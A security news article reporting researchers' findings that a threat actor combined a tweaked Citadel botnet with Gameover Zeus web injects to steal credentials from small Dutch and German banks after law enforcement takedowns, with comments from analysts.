This site uses cookies. By continuing to browse this site you are agreeing to our use of cookies. Find out more.X

Gameover Trojan rises from the dead

Share this article:

Despite the takedown of Gameover Zeus last month, security researchers say that a small group of cyber-criminals are using the Trojan, with a tweaked version of the Citadel botnet, to steal banking credentials.

Dangerous new Zeus Trojan fools anti-virus
Dangerous new Zeus Trojan fools anti-virus

Security researchers at Arbor Networks' ASERT division reveal in a new blog post how the cyber-criminals behind the Citadel campaign, which was taken down by Microsoft in June 2013, are now using a tweaked variant of the botnet alongside the Gameover Trojan to target a number of small European banks.

The threat actor behind Citadel can get a campaign started by buying builder software, building the malware and then distributing this into the wild to infect machines and make a profit. A log-in key in the Citadel code reveals a specific copy of the builder, and the key is copied into generated binaries so that a link between the malware and malware builder is known.

However, a key question is now being asked on how the Gameover Trojan – a favourite tool used by hackers against financial institutions – is still in operation.

Earlier this month, the FBI, NCA, Europol (EC3) and various other law enforcement agencies clubbed together in the ‘Operation Tovar' to disrupt the Gameover Zeus and CryptoLocker botnets, which were being used to infect some 500,000 PCs.

The agencies subsequently took control of Zeus' peer-to-peer (P2P) infrastructure, but didn't rule out the possibility that the same cyber-criminals would have moved onto new infrastructure within four to six weeks.

Investigative reporter and independent security researcher Brian Krebs suggests that “the curators of Gameover also have reportedly loaned out sections of their botnet to vetted third parties who have used them for a variety of purposes”, and this appears to be backed up by ASERT's findings.

“Analysing webinject data from the global configuration file that was being distributed on the peer-to-peer network shortly before its takedown on June 2, 2014; it looks as if the threat actor behind Citadel log-in key 5CB682C10440B2EBAF9F28C1FE438468 had joined the ranks of Gameover's coveted third party,” reads the analysis from ASERT security researcher Dennis Schwarz. “Checking historical versions of the config show that this collaboration goes back to at least January 2014.”

Crucially, this builder key was not associated with the 82 parties accused in Microsoft's Citadel lawsuit last year.

The company adds that the threat actor has modified the Citadel code to work with Gameover and to target “a small set of banks in Netherlands and Germany” and suggests that the group may have moved onto Gameover to steal bank credentials in late 2013, when Citadel activity was in decline.

In this latest case, Citadel's core code remains the same, but the web injects have been changed.

“So far, it seems as if this threat actor has escaped the clutches of the great Citadel take-down and, since the drop site is still receiving stolen credentials, has evaded the Zeus Gameover take-down as well.”

Schwarz added in an email to SCMagazineUK.com: “While the exact details haven't been released, I speculate that Operation Tovar took over/took down the domain generation algorithm (DGA) component and a set of, in Gameover parlance, super nodes or proxy nodes. Among other functions, these special nodes were the main channel for funnelling stolen banking credentials to the threat actors,” he said.

“What I found interesting from the third-party campaign mentioned in the blog is that it used an out of band channel (built into the particular set of web injects referenced) to exfiltrate stolen data--outside of the main conduit. This secondary channel was definitely still collecting stolen credentials from victims infected with Gameover post-Operation Tovar on June 2.

“One of the reasons why Zeus based malware is so popular is that web injects can be retrofitted from one variant to the next fairly easily. Based on the web injects mentioned in the blog, I believe this particularly threat actor was using both Citadel and their relationship with the Zeus Gameover crew to target the set of banks in the Netherlands and Germany.”

Kenneth Bechtel, malware research analyst at Tenable, said that this latest case is a classic example where takedowns can't keep up with the new strains of malware.

“Considering that malware is often used as a profit centre, this development comes as no surprise,” he said to SCMagazineUK.com.

“Major takedowns such as the Citadel campaign and even Zeus net have had positive results.  However, with the sheer volume of variants being controlled, it is no real surprise that a few very small organisations were targeted, slipping through the cracks.”

“Since this one has popped up on someone's radar, I'm confident it will be dealt with quickly. Dealing with malware and botnet Command and Control (C&C) is very much like playing whack-a-mole: while the industry does its best to be proactive, we cannot predict what server will be compromised next and leveraged for C&C, and can only react accordingly. As long as malware is being sold on the black market and used as a profit generator, we will continue to see this type of one-off attack.”

Share this article:

SC webcasts on demand

This is how to secure data in the cloud


Exclusive video webcast & Q&A sponsored by Vormetric


As enterprises look to take advantage of the cloud, they need to understand the importance of safeguarding their confidential and sensitive data in cloud environments. With the appropriate security safeguards, such as fine-grained access policies, a move to the cloud is as, or more, secure than an on-premise data storage.


View the webcast here to find out more

More in News

Targeted spear phishing campaign targets governments, law enforcement

Targeted spear phishing campaign targets governments, law enforcement

Kaspersky Lab claims to have identified a highly targeted spear phishing campaign that picks on high profile victims - including government, military, law enforcement agencies and embassies.

Malaysian investigators 'hacked' for confidential MH370 records

Malaysian investigators 'hacked' for confidential MH370 records

Around 30 computers at Malaysian law enforcement agencies looking into the disappearance of the MH370 airplane have reportedly been hacked, with perpetrators making off with confidential data on the aircraft.

75,000 reasons not to jailbreak your iPhone or iPad

75,000 reasons not to jailbreak your iPhone or ...

Malicious AdThief malware replaces adverts appearing on Apple users screens